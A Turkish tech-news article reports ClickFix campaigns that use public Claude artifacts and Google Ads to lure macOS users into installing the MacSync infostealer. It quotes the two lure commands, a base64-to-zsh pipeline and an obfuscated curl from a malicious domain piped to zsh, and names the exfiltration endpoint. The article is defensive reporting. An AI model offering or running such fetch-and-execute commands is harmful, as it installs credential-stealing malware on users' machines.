Siber Güvenlik

Kritik Uyarı: Claude LLM Kötüye Kullanılıyor, Mac Bilgileri Çalınıyor!

teknomers
teknomers

Giriş

Kötü niyetli aktörler, Claude ve Google Ads’i kullanarak macOS kullanıcılarına yönelik infostealer kötü amaçlı yazılım dağıtan ClickFix kampanyaları düzenliyor. Bu saldırılar, belirli aramalara yanıt olarak tehlikeli içeriklerin sunulmasıyla gerçekleşiyor ve ciddi bir güvenlik tehdidi oluşturuyor.

Contents

Saldırı Nasıl Çalışıyor?

Araştırmalara göre, saldırının en az iki varyasyonu gözlemlenmiştir. Kullanıcılara yönelik kötü amaçlı arama sonuçları, aşağıdaki gibi sorgular üzerinden gerçekleştirilmektedir:

  • “online DNS resolver”
  • “macOS CLI disk space analyzer”
  • “HomeBrew”

Bu arama sonuçları, ya kamuya açık bir Claude artifact’ine veya sahte Apple Destek makalesine yönlendirmektedir. Her iki durumda da kullanıcıdan Terminal’e bir shell komutu yapıştırması istenmektedir.

İlk saldırı varyasyonunda verilen komut:
‘echo "..." | base64 -D | zsh,’

İkinci varyasyonda ise verilen komut:
‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’

Bu komutların çalıştırılması, kullanıcıların sistemlerine kötü amaçlı bir yazılım olan MacSync infostealer’ı yüklemektedir.

Etkilenen Sistemler

CVE kodları arası bağlantılar ile etkilenen sistemlerin özellikleri:

  • Kötü amaçlı yazılım, sistemde bulunan hassas bilgileri toplamak için kullanıcıdan yetki alır.
  • MacSync infostealer, kullanıcı verilerini topladıktan sonra bu bilgileri a2abotnet[.]com/gate adresine iletmektedir.

Çözüm ve Korunma

Kullanıcılara, Terminal’de tam olarak anlamadıkları komutları çalıştırmamaları yönünde güçlü bir uyarıda bulunulmaktadır.  Kaspersky  araştırmacıları, kullanıcıların sağlanan komutların güvenli olup olmadığını belirlemek için aynı konuşmada chatbot’a bunu sormalarını önermektedir.

Ayrıca, aşağıdaki önlemleri almanızı tavsiye ederiz:

  • MacOS sistemlerini güncelleyin.
  • Güvenlik yazılımlarınızı aktif ve güncel tutun.
  • Tehlikeli bulduğunuz arama sonuçlarını takip etmeyin.
  • Bilgisayarınıza gelen şüpheli bağlantılara tıklamayın.

Sonuç olarak, kullanıcıların dikkatli olması ve güvenlik önlemlerini artırarak siber saldırılardan korunmaları hayati önem taşımaktadır.

Kritik: Hacker’lar Yanlış Yapılandırılmış Proxylere Saldırıyor!
Mac sahipleri ClearFake’e dikkat: Sahte Chrome ve Safari güncellemeleri ne kadar tehlikeli kötü amaçlı yazılımlar yayıyor?
Şifreli bulut depolama uygulaması Proton Drive artık Mac’te: Tüm ayrıntılar
GeoServer Güvenlik Açığı, Arka Kapılar ve Botnet Kötü Amaçlı Yazılımları Sunmak İçin Hackerlar Tarafından Hedef Alındı
Gizemli ‘Sandman’ APT, Yeni Arka Kapıyla Telekom Sektörünü Hedefliyor
ETİKETLENDİ:
Bu Makaleyi Paylaş
Önceki Makale Fintech Devlerinden Figure’dan Veri İhlali Açıklaması
Sonraki Makale ABD ile Tayvan arasındaki ticaret anlaşması: Gümrük %15’e düştü

Sanal Medya

Son Eklenenler

Final Fantasy 7 Yeniliklerinde Sephiroth’a Beklenmedik Dokunuş
Oyun
Sriram Krishnan, Beyaz Saray’daki AI danışmanlığından ayrılıyor
Yapay Zeka
En Sevimli Oyunlar: Wholesome Direct 2026’dan Seçtiklerimiz
Liste
Oyun ses çubuğu 5 metre uzaktan ele geçirilebiliyor, risk yok mu?
Donanım
Teknolojinin Gizliliği Kaybettiği Günlere Özlem Duyuluyor
Liste
Trump yönetimi OpenAI’de hisse alabilir mi?
Yapay Zeka